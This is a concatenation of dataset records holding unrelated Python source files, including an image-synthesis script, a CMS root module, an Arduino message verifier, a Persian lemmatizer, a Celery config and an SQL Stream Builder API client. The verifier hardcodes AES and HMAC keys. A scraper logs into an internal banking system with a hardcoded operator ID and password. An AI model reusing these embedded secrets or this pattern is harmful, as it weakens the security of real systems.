bg_width - font_size)\n y = random.randint(0, bg_height - font_size)\n\n is_overlapped = [isOverlapped(prev_img, (x, y, font_size, font_size)) for prev_img in prev_images]\n\n if not any(is_overlapped):\n found_new_pos = True\n prev_images.append((x, y, font_size, font_size))\n\n # bg_img = cv2.rectangle(bg_img, (x, y), (x+font_size, y+font_size), (0,255,0), 3)\n char_img = cv2.imread(file)\n bg_img = patchImage(bg_img, char_img, x, y, font_size)\n\n return bg_img, prev_images[1:]\n\n\ndef makeXML(file_path, bg_img, char_names, char_info=(0, 0, 0, 0)):\n # char_info: (x, y, font_size, font_size)\n\n def indent(elem, level=0):\n i = \"\\n\" + level * \" \"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \" \"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for elem in elem:\n indent(elem, level + 1)\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = i\n\n bg_height, bg_width, bg_chn = bg_img.shape\n\n annotation = Element(\"annotation\")\n SubElement(annotation, \"folder\").text = TARGET_ROOT_DIR\n SubElement(annotation, \"filename\").text = str(file_path.split('/')[-1])\n size = Element(\"size\")\n annotation.append(size)\n SubElement(size, \"width\").text = str(bg_width)\n SubElement(size, \"height\").text = str(bg_height)\n SubElement(size, \"depth\").text = '3'\n\n for i, char in enumerate(char_names):\n obj = Element(\"object\")\n annotation.append(obj)\n SubElement(obj, \"name\").text = char\n bndbox = Element(\"bndbox\")\n obj.append(bndbox)\n\n x, y, width, height = char_info[i]\n\n SubElement(bndbox, \"xmin\").text = str(x)\n SubElement(bndbox, \"ymin\").text = str(y)\n SubElement(bndbox, \"xmax\").text = str(x + width)\n SubElement(bndbox, \"ymax\").text = str(y + height)\n\n indent(annotation)\n # dump(annotation)\n file_name = file_path.split('/')[-1].split('.')[0]\n ElementTree(annotation).write(os.path.join(TARGET_ANNO_DIR, file_name + '.xml'), encoding='utf-8')\n\n\n# list up & shuffle character image files\nchar_filenames = findImages(root_dir=SOURCE_CHAR_DIR, file_format=SOURCE_CHAR_FORMAT)\n\nshuffled_char_filenames = shuffleFileLists(char_filenames)\n\n# list up background image files\nbg_filenames = findImages(root_dir=SOURCE_BG_DIR, file_format=SOURCE_BG_FORMAT)\n\nshuffled_bg_filenames = shuffleFileLists(bg_filenames)\n\n# list up how to distribute char images on background images\nchar_distribute_plan = []\n\nfor _ in range(NUMBER_OF_IMAGES):\n random_number = random.randint(NUM_OF_CHARS_RANGE[0], NUM_OF_CHARS_RANGE[1])\n char_distribute_plan.append(random_number)\n\n# patch character images on background images according to the plan\nnum_chars = len(shuffled_char_filenames)\nnum_bgs = len(shuffled_bg_filenames)\n\nchar_idx = 0\nbg_idx = 0\nfor i, num_of_images in enumerate(char_distribute_plan):\n synth_img, char_info = drawNonOverlappingImages(\n shuffled_bg_filenames[bg_idx],\n shuffled_char_filenames[char_idx:char_idx + num_of_images])\n\n # save a synthetic image\n file_path = os.path.join(TARGET_IMG_DIR, str(i) + TARGET_FILE_FORMAT)\n cv2.imwrite(file_path, synth_img)\n\n # Save a xml file\n char_names = [filename.split('/')[-2]\n for filename\n in shuffled_char_filenames[char_idx:char_idx + num_of_images]]\n\n makeXML(file_path, synth_img, char_names, char_info)\n\n char_idx = (char_idx + num_of_images) % num_chars\n bg_idx = i % num_bgs\n\n if not (i % DISPLAY_SAMPLE_PER_N):\n print(\"Synthetic image output: # {}\".format(i))\n plt.imshow(synth_img)\n plt.show()\n\n# split train/val/test set\nshuffled_index = list(range(NUMBER_OF_IMAGES))\nrandom.seed(RANDOM_SEED)\nrandom.shuffle(shuffled_index)\n\nnum_train = int(NUMBER_OF_IMAGES * TRAIN_SET / (TRAIN_SET + VALID_SET + TEST_SET))\nnum_valid = int(NUMBER_OF_IMAGES * VALID_SET / (TRAIN_SET + VALID_SET + TEST_SET))\nnum_test = NUMBER_OF_IMAGES - num_train - num_valid\n\nwith open(TARGET_ROOT_DIR + \"/train.txt\", \"w\") as wf:\n for index in shuffled_index[0:num_train]:\n wf.write(str(index) + '\\n')\n\nwith open(TARGET_ROOT_DIR + \"/val.txt\", \"w\") as wf:\n for index in shuffled_index[num_train:num_train + num_valid]:\n wf.write(str(index) + '\\n')\n\nwith open(TARGET_ROOT_DIR + \"/trainval.txt\", \"w\") as wf:\n for index in shuffled_index[0:num_train + num_valid]:\n wf.write(str(index) + '\\n')\n\nwith open(TARGET_ROOT_DIR + \"/test.txt\", \"w\") as wf:\n for index in shuffled_index[num_train + num_valid:]:\n wf.write(str(index) + '\\n')\n\nwith open(TARGET_ROOT_DIR + \"/labels.txt\", \"w\") as wf:\n for label in os.listdir(SOURCE_CHAR_DIR):\n wf.write(str(label) + '\\n')\n\nprint(\"Train / Valid / Test : {} / {} / {}\".format(num_train, num_valid, num_test))\nprint(\"Output path: {}\".format(TARGET_ROOT_DIR))\nprint(\"Made {} synthetic images.\".format(NUMBER_OF_IMAGES))","sub_path":"tools/phd08_synth_image.py","file_name":"phd08_synth_image.py","file_ext":"py","file_size_in_byte":10287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"210822567","text":"##### Background #####\n# We add a Leap Day on February 29, almost every four years. The leap day is an extra, or intercalary, day and we add it to the shortest month of the year, February. In the Gregorian calendar three criteria must be taken into account to identify leap years:\n## The year can be evenly divided by 4, unless the year can evenly be divided by 100 and not evenly divisible by 400.\n\n##### Task #####\n# You are given the year, and you have to write a function to check if the year is leap or not\n# Note that you have to complete the function and remaining code is given as a template\n\n##### Input Format #####\n# Ready y, the year that needs to be checked\n\n##### Constraints #####\n# 1900 <= y <= 10^5\n\n##### Output Format #####\n# Output is taken care of by the template. Your function must return a boolean value.\n\ndef is_leap(year):\n\n if( year % 4 != 0 ):\n return False\n elif( year % 100 != 0 ):\n return True\n elif( year % 400 != 0 ):\n return False\n else:\n return True\n \n\nif __name__ == \"__main__\":\n year = int( input() )\n print( is_leap(year) )\n\n##### Sample Input #####\n# 1990\n##### Expected Output #####\n# False","sub_path":"Introduction/writeafunction.py","file_name":"writeafunction.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"27195834","text":"\"\"\" Aplication Root \"\"\"\nimport sqlalchemy as sqla\nimport ptah\nfrom ptah import config\nfrom zope import interface\n\nfrom node import Node, Session, set_policy\nfrom container import Container\nfrom interfaces import IApplicationRoot, IApplicationPolicy\n\n\nAPPFACTORY_ID = 'ptah.cms:appfactory'\n\ndef get_app_factories():\n return config.get_cfg_storage(APPFACTORY_ID)\n\n\nclass ApplicationRoot(Container):\n interface.implements(IApplicationRoot)\n\n __root_path__ = '/'\n\n def __resource_url__(self, request, info):\n return self.__root_path__\n\n\nclass ApplicationPolicy(object):\n interface.implements(IApplicationPolicy)\n\n __name__ = ''\n __parent__ = None\n\n # default acl\n __acl__ = ptah.DEFAULT_ACL\n\n def __init__(self, request):\n self.request = request\n\n\nclass ApplicationFactory(object):\n\n def __init__(self, factory, path='', name='', title='',\n policy = ApplicationPolicy, default_root = None, config=None):\n self.id = '-'.join(part for part in path.split('/') if part)\n self.path = path if path.endswith('/') else '%s/'%path\n self.name = name\n self.title = title\n\n self.default_root = default_root\n if not path and default_root is None:\n self.default_root = True\n\n if isinstance(factory, type) and issubclass(factory, Node):\n factory = factory.__type__\n\n self.factory = factory\n self.policy = policy\n\n if config is not None:\n ptah.config.get_cfg_storage(\n APPFACTORY_ID, registry=config.registry)[self.id] = self\n\n info = ptah.config.DirectiveInfo()\n info.attach(\n ptah.config.Action(\n lambda cfg: cfg.get_cfg_storage(APPFACTORY_ID)\\\n .update({self.id:self}),\n discriminator=(APPFACTORY_ID, path))\n )\n\n _sql_get_root = ptah.QueryFreezer(\n lambda: Session.query(Container)\\\n .filter(sqla.sql.and_(\n Container.__name_id__ == sqla.sql.bindparam('name'),\n Container.__type_id__ == sqla.sql.bindparam('type'))))\n\n def __call__(self, request=None):\n root = self._sql_get_root.first(\n name=self.name, type=self.factory.__uri__)\n if root is None:\n root = self.factory.create(title=self.title)\n root.__name_id__ = self.name\n root.__path__ = '/%s/'%root.__uri__\n Session.add(root)\n Session.flush()\n\n root.__root_path__ = self.path\n root.__parent__ = policy = self.policy(request)\n root.__default_root__ = self.default_root\n\n set_policy(policy)\n\n if request is not None:\n request.root = root\n return root\n","sub_path":"ptah/cms/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"406419693","text":"#!/usr/bin/env python3\nimport binascii\nimport hashlib\nimport hmac\nimport os\nimport sys\nfrom time import sleep, time\nfrom termcolor import colored\n\nimport serial\n\nsys.path += [ os.path.join(os.path.split(__file__)[0], '../libs/python') ]\n\nfrom aes import AESCipher, unpad\nfrom intelhex import IntelHex\nfrom listPorts import getPorts\n\nAES_NONCE_LENGTH = 16\nMAC_LENGTH = 20\nAES_KEY = bytes([0x39, 0x79, 0x24, 0x42, 0x26, 0x45, 0x29, 0x48, 0x40, 0x4D, 0x63, 0x51, 0x66, 0x54, 0x6A, 0x57])\nMAC_KEY = bytes([0x93, 0x79, 0x24, 0x42, 0x26, 0x45, 0x29, 0x48, 0x40, 0x4D, 0x63, 0x51, 0x66, 0x54, 0x6A, 0x57, 0xff, 0xff, 0xff, 0xff])\n\ndef read_message(ser: serial.Serial) -> dict:\n # Message structure\n #+---------+-----------+------------+----------+--------+\n #| Timer | AES nonce | HMAC nonce | MAC | Data |\n #+---------+-----------+------------+----------+--------+\n #| 2 bytes | 16 bytes | 20 bytes | 20 bytes | 1 byte |\n #+---------+-----------+------------+----------+--------+\n # The HMAC nonce, MAC and data are encrypted with AES in CBC mode\n msg_length = int.from_bytes(ser.read(2), byteorder='big')\n msg_components = dict()\n msg_components['timer'] = int.from_bytes(ser.read(2), byteorder='big')\n aes_nonce = ser.read(16)\n encrypted_part = ser.read(msg_length - 2 - 16)\n decrypted_part = unpad(AESCipher(AES_KEY).decryptCBC(encrypted_part, aes_nonce))\n msg_components['mac_nonce'] = decrypted_part[:20]\n msg_components['mac'] = decrypted_part[20:40]\n msg_components['data'] = int.from_bytes(decrypted_part[-1:], byteorder='big')\n return msg_components\n\n\ndef main():\n # Check if hexfile exists\n hexfile = \"proof-carrying.hex\"\n if not os.path.isfile(hexfile):\n print(\"ERROR: File not found:\", hexfile)\n sys.exit(2)\n ih = IntelHex(hexfile)\n\n # Setup serial connection\n ports = getPorts()\n if len(ports) == 0:\n print(\"No serial ports found. Please check your USB connection and try again.\")\n sys.exit(1)\n port = ports[0]\n print(f\"No port specified, defaulting to {port}\")\n ser = serial.Serial(port, 9600)\n\n # Restart arduino\n ser.setDTR(False)\n print(\"Resetting Arduino...\")\n sleep(1)\n ser.setDTR(True)\n\n # Read 'Arduino is ready' message\n response_length = int.from_bytes(ser.read(2), byteorder='big')\n print(ser.read(response_length).decode(\"utf8\"))\n # Acknowledge welcome message\n ser.write(b's')\n ser.flush()\n\n while True:\n # Wait for message\n msg = read_message(ser)\n elapsed_time = msg['timer']\n mac_nonce = msg['mac_nonce']\n remote_mac = msg['mac']\n data = msg['data']\n\n # Calc digest\n hmac_gen = hmac.new(MAC_KEY, None, hashlib.sha1)\n hmac_gen.update(ih.tobinstr(0,30*1024-1))\n hmac_gen.update(msg['mac_nonce'])\n local_mac = hmac_gen.digest()\n\n if (remote_mac == local_mac):\n print(colored(f\"✓ Received message has valid proof \", 'green', attrs=[\"bold\"]) + f\"({remote_mac.hex()})\")\n else:\n print(colored(f\"✗ Received message with invalid proof!\", \"red\", attrs=[\"bold\"]))\n print(f\"Measurement: {data}\")\n print(f\"Time to create message: {elapsed_time}ms\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/proof-carrying/verifier.py","file_name":"verifier.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"321168854","text":"from classification.model import VGG_ResNet\nimport config as C\nimport torch\nfrom torchvision.transforms import ToTensor, Compose\n\n\nclass Classifier:\n def __init__(self, checkpoint):\n self.classifier = VGG_ResNet(C.NUM_CLASSES).cuda()\n self.classifier.load_state_dict(\n torch.load(checkpoint)\n )\n\n def predict(self, imgs):\n imgs = torch.Tensor(imgs)/255\n imgs = imgs.cuda()\n self.classifier.eval()\n output = self.classifier.forward(imgs)\n label = torch.argmax(output, 1)\n return label.cpu().detach().numpy()\n\n","sub_path":"classification/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"581820020","text":"\"\"\"Feed Manager for NSW Transport Service Incidents feed.\"\"\"\nfrom typing import List, Tuple, Callable, Awaitable\n\nfrom aio_geojson_client.feed_manager import FeedManagerBase\nfrom aio_geojson_client.status_update import StatusUpdate\nfrom aiohttp import ClientSession\n \nfrom .feed import NswTransportServiceIncidentsFeed\n\n\nclass NswTransportServiceIncidentsFeedManager(FeedManagerBase):\n \"\"\"Feed Manager for NSW Transport Services Incidents feed.\"\"\"\n\n def __init__(self,\n websession: ClientSession,\n generate_callback: Callable[[str], Awaitable[None]],\n update_callback: Callable[[str], Awaitable[None]],\n remove_callback: Callable[[str], Awaitable[None]],\n coordinates: Tuple[float, float],\n filter_radius: float = None,\n filter_categories: List[str] = None,\n hazard: str = None,\n status_callback: Callable[[StatusUpdate],\n Awaitable[None]] = None):\n \"\"\"Initialize the NSW Transport Services Feed Manager.\"\"\"\n feed = NswTransportServiceIncidentsFeed(\n websession,\n coordinates,\n filter_radius=filter_radius,\n hazard=hazard,\n filter_categories=filter_categories)\n super().__init__(feed,\n generate_callback,\n update_callback,\n remove_callback,\n status_async_callback=status_callback)\n","sub_path":"aio_geojson_nsw_transport_incidents/feed_manager.py","file_name":"feed_manager.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"309144759","text":"# -*- coding: utf-8 -*-\n\npronouns = [('م', 'مان'), ('ت', 'تان'), ('ش', 'شان')]\nids = [('م', 'یم'), ('ی', 'ید'), ('', 'د', 'ند')]\n# principals = [('خورد', 'خور'), ('رفت', 'رو'), ('نوشت', 'نویس'), ('آمد', 'آی'), ('گرفت', 'گیر'), ('زد', 'زن')]\nprincipals = ['خورد', 'خور', 'رفت', 'رو', 'نوشت', 'نویس', 'آمد', 'آی', 'گرفت', 'گیر', 'زد', 'زن']\n\n\nclass Lemmatizer(object):\n def __init__(self):\n pass\n\n def lemmatize(self, word):\n for per in ids:\n for id in per:\n if word.endswith(id):\n rest = word[:-len(id)] if len(id) > 0 else word\n tmp = ['ه بود', 'ه باش', 'ه ا', 'ه اس']\n for t in tmp:\n if rest.endswith(t):\n rest = rest[:-len(t)]\n tmp = ['می ', 'داشت' + id + ' می ', 'می', 'داشت' + id + ' می', 'ب', 'دار' + id + ' می ', 'دار' + id + ' می']\n for t in tmp:\n if rest.startswith(t):\n rest = rest[len(t):]\n if rest in principals:\n print(rest)\n if len(id) > 0 and word.startswith('خواه' + id + ' ') and word[len('خواه' + id + ' '):] in principals:\n print(word[len('خواه' + id + ' '):])\n\n\nquery = input('query: ')\nlemmatizer = Lemmatizer()\nlemmatizer.lemmatize(query)\n","sub_path":"func/m_lemmatizer.py","file_name":"m_lemmatizer.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"606536173","text":"import datetime\nimport http.cookiejar\nimport urllib.request\nimport pandas as pd\n\n\ndef get_html():\n\n # set up\n date_hyphen = datetime.date.today().isoformat()\n cj = http.cookiejar.CookieJar()\n\n # get coolie\n req = urllib.request.Request(url='http://116.212.0.18:8080/exbadm/loginAction.do?method=goToIndex', method='GET')\n with urllib.request.urlopen(req) as rsp:\n cj.extract_cookies(rsp, req)\n\n # log in\n body = \"orgId=304311000000&operId=000003&passwd=111111\".encode(\"latin_1\")\n req = urllib.request.Request(url='http://116.212.0.18:8080/exbadm/loginAction.do?method=login',data=body, method='POST')\n with urllib.request.urlopen(req) as rsp:\n cj.extract_cookies(rsp, req)\n\n # search cddb hddb\n url_search = \"http://116.212.0.18:8080/exbadm/queryAction.do\"\n params_search = \"?method=queryTrnjour&startDate=\" + date_hyphen + \\\n \"&typeFlag=query&endDate=\" + date_hyphen + \"&transResult=success&dbType=cddb&curpage=1&\" + \\\n \"pageCount=1000&pagesize=1000\"\n req = urllib.request.Request(url=url_search+params_search, method='GET')\n cj.add_cookie_header(req)\n with urllib.request.urlopen(req) as rsp:\n webpage = rsp.read() # UTF-8\n return webpage\n\n\ndef save_file(file, path):\n with open(path, mode=\"a\") as f:\n f.write(file)\n\n\ndef distinguish(row):\n is_maker = row['提出行'] == 304311000016 or row['提出行'] == 304311225954 or \\\n row['提出行'] == 304311525821 or row['提出行'] == 304311026021\n is_credit = row['借贷'] == '贷'\n if is_maker == is_credit:\n row['金额'] *= -1\n else:\n row['户名'] = row['收款人户名']\n return row\n\n\ndef get_sheet(web_page):\n df = pd.read_html(web_page.decode(\"utf_8\"))[1]\n df['户名'] = df['付款人户名']\n df = df.apply(distinguish, axis=1)\n df = df[['交易日期', '金额', '户名']]\n df = df.groupby(['交易日期', '户名']).sum()\n df = df.reset_index().reindex(columns=['交易日期', '金额', '户名'])\n return df\n\n\ndef filter_sheet(df):\n return df\n\n\ndef get_csv(df):\n return df.to_csv(mode=\"a\", header=False, index=None)\n\n\ndef main():\n html_file = get_html()\n # save_file(html_file, \"C:\\\\Users\\\\Admin\\\\Desktop\\\\当日同城.html\")\n sheet_all = get_sheet(html_file)\n sheet_large = get_csv(filter_sheet(sheet_all))\n save_file(sheet_large, \"C:\\\\Users\\\\Admin\\\\Desktop\\\\当日大额及同城.csv\")\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"data_picking/sub/same_city_current.py","file_name":"same_city_current.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"408750462","text":"BROKER_HOST = \"localhost\"\nBROKER_PORT = 6379\n#BROKER_USER = \"guest\"\n#BROKER_PASSWORD = \"guest\"\nBROKER_VHOST = \"/\"\n\n# バックエンドを指定。今回はRabbitMQに対してAMQPというプロトコルで接続する\nCELERY_RESULT_BACKEND = \"redis\"\n\n# workerの設定\n## 平行度 CPUの数に近づけるといいらしい。省略するとCPU/coreが使われる。\n#CELERYD_CONCURRENCY\n## ログの出力先。省略すると標準エラー出力が選ばれる\nCELERYD_LOG_FILE = \"celeryd.log\"\n## ログのレベル\nCELERYD_LOG_LEVEL = \"INFO\" # DEBUG, INFO, WARNING, ERROR or CRITICAL\n\n# 起動時に読み込むモジュール\nCELERY_IMPORTS = (\"app\",)","sub_path":"web_api/celeryconfig.py","file_name":"celeryconfig.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"416703800","text":"from django import forms\nfrom .models import Reader, Book\n\n\nclass ReaderCreateForm(forms.ModelForm):\n \"\"\"\n Form to create object of Reader model.\n \"\"\"\n class Meta:\n model = Reader\n fields = ['first_name', 'last_name']\n\n\nclass BookCreateForm(forms.ModelForm):\n \"\"\"\n Form to create or update object of Book model.\n \"\"\"\n\n class Meta:\n model = Book\n fields = ['author', 'name', 'description']\n\n def process(self, reader_id):\n \"\"\"\n Method 'process' creates a Book model object for the current object of Reader model.\n :param reader_id: id of current Reader\n \"\"\"\n data = self.cleaned_data\n reader = Reader.objects.filter(id=reader_id)\n instance = Book.objects.create(**data)\n instance.reader.set(reader)\n","sub_path":"library/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"585293356","text":"####\n# Xml file io for OscDrop class\n#===\n# To do:\n# -> add comments\n# -> write tests\n# -> address code repetition in write\n# -> better data storage would help this a lot...\n####\nimport xml.etree.ElementTree as ET\n\nfrom ElementTree_HuRe import prettify\nfrom oscdropbase import OscDropBase as odb\n\n# Reads droplet parameter data from an xml file and returns a dictionary\n# of tag, value pairs\ndef read(infile):\n root_node = ET.parse(infile).getroot()\n defn_node = root_node.find(odb._defn)\n defn_cats = [cat for cat in defn_node.getchildren()]\n defn_prms = [param for cat in defn_cats for param in cat]\n return {prm.tag : prm.get('value') for prm in defn_prms}\n\n# Writes droplet data to an xml file from a dict containing data\ndef write(outdata, outfile):\n root_node = ET.Element('droplet')\n def populate_nodes(parent, params):\n for param in params:\n node = ET.SubElement(parent, param)\n node.attrib['value'] = outdata[param] if param in outdata else odb.float_to_str(0.0)\n defn_node = ET.SubElement(root_node, odb._defn)\n for cat in odb._defn_data.keys():\n cat_node = ET.SubElement(defn_node, cat)\n for param in odb._defn_data[cat]:\n prm_node = ET.SubElement(cat_node, param)\n prm_node.attrib['value'] = outdata[param]\n thry_node = ET.SubElement(root_node, odb._thry)\n xpmt_node = ET.SubElement(root_node, odb._xpmt)\n populate_nodes(thry_node, odb._thry_prms)\n populate_nodes(xpmt_node, odb._xpmt_prms)\n #===\n # Write xml tree to file in a nicely whitespaced xml format\n with open(outfile, 'w') as output:\n output.write(prettify(root_node))\n\n## M. Sullivan. August, 2016\n","sub_path":"oscdrop/oscdrop/oscdropxml.py","file_name":"oscdropxml.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"575078357","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport json\nimport uuid\n\nfrom . import *\nfrom . import cm\nfrom requests_kerberos import HTTPKerberosAuth, DISABLED\n\n_SSB_USER = 'admin'\n_SSB_SESSION = None\n_SSB_CSRF_TOKEN = None\n\n_API_INTERNAL = 'internal'\n_API_EXTERNAL = 'external'\n_API_UI = 'ui'\n_FLINK_VERSION = None\n\n\n_CSRF_REGEXPS = [\n r'.*name=\"csrf_token\" type=\"hidden\" value=\"([^\"]*)\"',\n r'.*var *csrf_token *= *\"([^\"]*)\"'\n]\n\n\ndef _get_csrf_token(txt, quiet=True):\n token = None\n for regexp in _CSRF_REGEXPS:\n m = re.match(regexp, txt, flags=re.DOTALL)\n if m:\n token = m.groups()[0]\n break\n else:\n if not quiet:\n raise RuntimeError(\"Cannot find CSRF token.\")\n return token\n\n\ndef _get_ui_port():\n return '8001' if is_tls_enabled() else '8000'\n\n\ndef _get_api_url():\n return '{}://{}:{}/api/v1'.format(get_url_scheme(), get_hostname(), _get_ui_port())\n\n\ndef _get_rest_api_url():\n return '{}://{}:18121/api/v1'.format(get_url_scheme(), get_hostname())\n\n\ndef _get_ui_url():\n return '{}://{}:{}/ui'.format(get_url_scheme(), get_hostname(), _get_ui_port())\n\n\ndef _get_url(api_type):\n if api_type == _API_UI:\n return _get_ui_url()\n elif api_type == _API_INTERNAL:\n return _get_api_url()\n else:\n return _get_rest_api_url()\n\n\ndef _api_call(func, path, data=None, files=None, headers=None, api_type=_API_INTERNAL, token=False):\n global _SSB_CSRF_TOKEN\n if not headers:\n headers = {}\n if api_type != _API_UI:\n headers['Content-Type'] = 'application/json'\n data = json.dumps(data)\n auth = None\n if is_kerberos_enabled():\n auth = HTTPKerberosAuth(mutual_authentication=DISABLED)\n else:\n headers['Username'] = 'admin'\n if token:\n headers['X-CSRF-TOKEN'] = _SSB_CSRF_TOKEN\n url = _get_url(api_type) + path\n resp = func(url, data=data, headers=headers, files=files, auth=auth)\n if resp.status_code != requests.codes.ok:\n raise RuntimeError(\"Call to {} returned status {}. \\nData: {}\\nResponse: {}\".format(\n url, resp.status_code, json.dumps(data), resp.text))\n\n token = _get_csrf_token(resp.text)\n if token:\n _SSB_CSRF_TOKEN = token\n return resp\n\n\ndef _api_get(path, data=None, api_type=_API_INTERNAL, token=False):\n return _api_call(_get_session().get, path, data=data, api_type=api_type, token=token)\n\n\ndef _api_post(path, data=None, files=None, headers=None, api_type=_API_INTERNAL, token=False):\n return _api_call(_get_session().post, path, data=data, files=files, headers=headers, api_type=api_type, token=token)\n\n\ndef _api_delete(path, data=None, api_type=_API_INTERNAL, token=False):\n return _api_call(_get_session().delete, path, data=data, api_type=api_type, token=token)\n\n\ndef _get_session():\n global _SSB_SESSION\n if not _SSB_SESSION:\n _SSB_SESSION = requests.Session()\n if is_tls_enabled():\n _SSB_SESSION.verify = get_truststore_path()\n\n _api_get('/login', api_type=_API_UI)\n _api_post('/login', {'next': '', 'login': _SSB_USER, 'password': get_the_pwd()}, api_type=_API_UI, token=True)\n return _SSB_SESSION\n\n\ndef _get_flink_version():\n global _FLINK_VERSION\n if not _FLINK_VERSION:\n _FLINK_VERSION = cm.get_product_version('FLINK')\n return _FLINK_VERSION\n\n\ndef _get_csa_version():\n parcel_version = _get_flink_version()\n version_match = re.match(r'.*csa-?([0-9.]*).*', parcel_version)\n return [int(v) for v in version_match.groups()[0].split('.')]\n\n\ndef is_csa16_or_later():\n return _get_csa_version() >= [1, 6]\n\n\ndef is_ssb_installed():\n return len(cm.get_services('SQL_STREAM_BUILDER')) > 0\n\n\ndef create_data_provider(provider_name, provider_type, properties):\n if is_csa16_or_later():\n provider_type_attr = 'type'\n else:\n provider_type_attr = 'provider_type'\n data = {\n 'name': provider_name,\n provider_type_attr: provider_type,\n 'properties': properties,\n }\n if is_csa16_or_later():\n return _api_post('/internal/external-provider', data, api_type=_API_INTERNAL, token=True)\n else:\n return _api_post('/external-providers', data)\n\n\ndef get_data_providers(provider_name=None):\n if is_csa16_or_later():\n resp = _api_get('/internal/external-provider', api_type=_API_INTERNAL)\n providers = resp.json()\n else:\n resp = _api_get('/external-providers')\n providers = resp.json()['data']['providers']\n return [p for p in providers if provider_name is None or p['name'] == provider_name]\n\n\ndef delete_data_provider(provider_name):\n assert provider_name is not None\n for provider in get_data_providers(provider_name):\n if is_csa16_or_later():\n _api_delete('/internal/external-provider/{}'.format(provider['provider_id']), api_type=_API_INTERNAL, token=True)\n else:\n _api_delete('/external-providers/{}'.format(provider['provider_id']))\n\n\ndef detect_schema(provider_name, topic_name):\n provider_id = get_data_providers(provider_name)[0]['provider_id']\n if is_csa16_or_later():\n raw_json = _api_get('/internal/kafka/{}/schema?topic_name={}'.format(provider_id, topic_name)).text\n return json.dumps(json.loads(raw_json), indent=2)\n else:\n return json.dumps(_api_get('/dataprovider-endpoints/kafkaSample/{}/{}'.format(provider_id, topic_name)).json()['data'], indent=2)\n\n\ndef create_kafka_table(table_name, table_format, provider_name, topic_name, schema=None, transform_code=None,\n timestamp_column=None, rowtime_column=None, watermark_seconds=None,\n kafka_properties=None):\n assert table_format in ['JSON', 'AVRO']\n assert table_format == 'JSON' or schema is not None\n provider_id = get_data_providers(provider_name)[0]['provider_id']\n if table_format == 'JSON' and schema is None:\n schema = detect_schema(provider_name, topic_name)\n data = {\n 'type': 'kafka',\n 'table_name': table_name,\n 'transform_code': transform_code,\n 'metadata': {\n 'topic': topic_name,\n 'format': table_format,\n 'endpoint': provider_id,\n 'watermark_spec': {\n 'timestamp_column': timestamp_column,\n 'rowtime_column': rowtime_column,\n 'watermark_seconds': watermark_seconds,\n },\n 'properties': kafka_properties or {},\n \"schema\": schema,\n }\n }\n if is_csa16_or_later():\n return _api_post('/internal/data-provider', data, api_type=_API_INTERNAL, token=True)\n else:\n return _api_post('/sb-source', data, token=True)\n\n\ndef get_tables(table_name=None, org='ssb_default'):\n if is_csa16_or_later():\n data = _api_get('/internal/catalog/tables-tree').json()\n assert 'tables' in data\n if 'ssb' in data['tables'] and org in data['tables']['ssb']:\n tables = data['tables']['ssb'][org]\n else:\n tables = []\n else:\n resp = _api_get('/sb-source')\n tables = resp.json()['data']\n return [t for t in tables if table_name is None or t['table_name'] == table_name]\n\n\ndef delete_table(table_name):\n assert table_name is not None\n for table in get_tables(table_name):\n if is_csa16_or_later():\n _api_delete('/internal/data-provider/{}'.format(table['id']), token=True)\n else:\n _api_delete('/sb-source/{}'.format(table['id']), token=True)\n\n\ndef execute_sql(stmt, job_name=None, parallelism=None, sample_interval_millis=None, savepoint_path=None,\n start_with_savepoint=None):\n if not job_name:\n job_name = 'job_{}_{}'.format(uuid.uuid1().hex[0:4], int(1000000*time.time()))\n data = {\n 'sql': stmt,\n 'job_parameters': {\n 'job_name': job_name,\n # 'snapshot_config': {\n # 'name': 'string',\n # 'key_column_name': 'string',\n # 'api_key': 'string',\n # 'recreate': true,\n # 'ignore_nulls': true,\n # 'enabled': true\n # },\n 'parallelism': parallelism,\n 'sample_interval_millis': sample_interval_millis,\n 'savepoint_path': savepoint_path,\n 'start_with_savepoint': start_with_savepoint\n },\n 'execute_in_session': True\n }\n headers = {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n return _api_post('/ssb/sql/execute', data, headers=headers, api_type=_API_EXTERNAL)\n\n\ndef get_jobs(state='RUNNING'):\n resp = _api_get('/ssb/jobs', api_type=_API_EXTERNAL)\n return [j for j in resp.json()['jobs'] if state is None or j['state'] == state]\n\n\ndef stop_job(job_name, savepoint=False, savepoint_path=None, timeout=1000, wait_secs=0):\n data = {\n 'savepoint': savepoint,\n 'savepoint_path': savepoint_path,\n 'timeout': timeout,\n }\n resp = _api_post('/ssb/jobs/{}/stop'.format(job_name), api_type=_API_EXTERNAL, data=data)\n while True:\n jobs = get_jobs()\n if not any(j['name'] == job_name for j in jobs):\n break\n 